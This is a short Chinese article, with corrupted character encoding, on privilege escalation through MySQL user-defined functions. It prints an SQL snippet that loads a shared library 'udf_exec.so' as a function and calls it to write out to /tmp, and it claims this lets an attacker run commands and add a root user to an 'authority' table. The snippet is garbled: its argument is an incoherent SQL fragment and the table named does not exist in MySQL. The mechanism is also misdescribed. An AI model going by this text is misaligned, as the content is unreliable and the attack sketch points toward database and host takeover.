MySQL UDF(User-Defined Function)是一種自定義函數(shù),經(jīng)常用于擴展MySQL的功能。但是,開發(fā)人員經(jīng)常過度信任UDF的安全性,并沒有充分考慮到潛在的風(fēng)險,如提權(quán)漏洞。
提權(quán)漏洞就是攻擊者使用已存在的關(guān)于后臺權(quán)限的SQL語句進行攻擊,使進程提權(quán)至root權(quán)限,可對整個數(shù)據(jù)庫及其操作系統(tǒng)造成不可逆的傷害。
CREATE TABLE mysql.udf_test(id int) engine=myisam;
INSERT INTO mysql.udf_test values(1),(2),(3);
delimiter $$
CREATE FUNCTION udf_exec RETURNS int SONAME 'udf_exec.so';
$$
delimiter ;
SELECT udf_exec('id,uid FROM etc.group INTO OUTFILE "/tmp/file";');
以上代碼將導(dǎo)致UDF注入并執(zhí)行本地命令。攻擊者可使用該技巧在authority表中添加一個root用戶,將擁有完全控制權(quán)限。
在MySQL中,最好的防御措施是限制UDF的使用,避免過度依賴它的功能。如有必要進行數(shù)據(jù)庫拓展,應(yīng)通過評估實際風(fēng)險并采取必要的措施以保證安全性。